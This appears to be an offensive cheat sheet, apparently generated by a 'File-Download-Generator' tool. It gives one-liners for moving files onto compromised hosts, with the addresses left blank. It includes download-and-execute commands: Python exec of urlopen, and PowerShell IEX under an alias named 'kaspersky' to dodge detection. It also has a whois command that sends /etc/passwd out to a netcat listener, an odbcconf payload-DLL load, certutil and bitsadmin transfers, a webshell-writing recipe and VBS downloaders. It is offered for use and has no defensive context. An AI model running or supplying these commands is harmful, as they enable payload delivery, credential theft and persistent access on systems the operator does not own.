File download command quick generator:
Open-source project: File-Download-Generator
Python HTTP:
python2 -m SimpleHTTPServer
Python3 HTTP:
python3 -m http.server
Python FTP:
python3 -m pyftpdlib -p
Python3 SMB:
python3 impacket-smbserver.py files . -port
Python2 Download:
python2 -c "import urllib2; exec urllib2.urlopen('http://:/').read();"
php 5.4+ http:
php -S 0.0.0.0:
ruby http:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => , :DocumentRoot => Dir.pwd).start'
ruby 1.9.2+ http:
ruby -run -e httpd . -p --bind-address 0.0.0.0
busybox httpd:
busybox httpd -f -p
PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://:/ -OutFile "
PowerShell - IEX:
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://:/', )"
CMD - Certutil:
certutil.exe -urlcache -split -f http://:/
CMD - SMB:
copy \\\files\
Windows IPC$:
copy \\c$\ C:\
Linux - wget:
wget http://:/ -O
Linux - curl:
curl http://:/ -o
Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://:/" c:\\
Windows msiexec:
msiexec /q /i http://:/
Windows msiexec:
msiexec /q /%os:~1,1% http://:/
Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://:/payload.ps1')
Windows odbcconf (executes a DLL that contains special functionality; such a DLL file does not need the .dll extension and can be downloaded over UNC/WebDAV):
odbcconf /s /a {regsvr \\http://:/\folder\payload_dll.txt}
Linux whois:
whois -h -p `cat /etc/passwd | base64`
nc -lvvp | sed "s/ //g" | base64 -d
CertReq.exe download:
CertReq -Post -config http://:/ c:\windows\win.ini output.txt
CertReq.exe upload (the response is shown in the terminal):
CertReq -Post -config http://:/ c:\windows\win.ini
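Windows echo: write a base64 + URL-encoded webshell, then decode it with CertUtil:
# Write: echo%20<base64 + URL-encoded webshell>%20>webshell.jsp
# CertUtil decode: CertUtil -decode <Base64-encoded file name (may include a path)> <decoded output file name (may include a path)>
# Note: the CertUtil output file name must not be the same as an existing file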
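Windows VBS downloader:
' Synchronous GET of the URL passed as the first argument
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
' Binary stream (Type = 1), read/write mode (Mode = 3)
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' Save to the path passed as the second argument (2 = overwrite)
sGet.SaveToFile LCase(WScript.Arguments(1)),2
Usage: save the content above as wget.vbs
cscript wget.vbs http://192.168.3.100:8080/test.txt test.txt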
Windows VBS downloader:
' Synchronous GET of a hard-coded URL
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.3.39:4433/hashes.txt",0
xPost.Send()
' Binary stream (Type = 1), read/write mode (Mode = 3)
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' Save to a hard-coded path (2 = overwrite)
sGet.SaveToFile "C:\hash.txt",2
Usage: down.vbs | cscript down.vbs
Reference: File Download Generator: https://file-downloads.com/